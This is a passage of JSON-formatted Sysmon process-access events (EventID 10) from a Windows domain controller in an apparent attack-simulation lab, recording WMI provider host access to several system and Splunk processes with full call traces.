\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","TargetProcessId":"3916","TargetImage":"C:\\Program 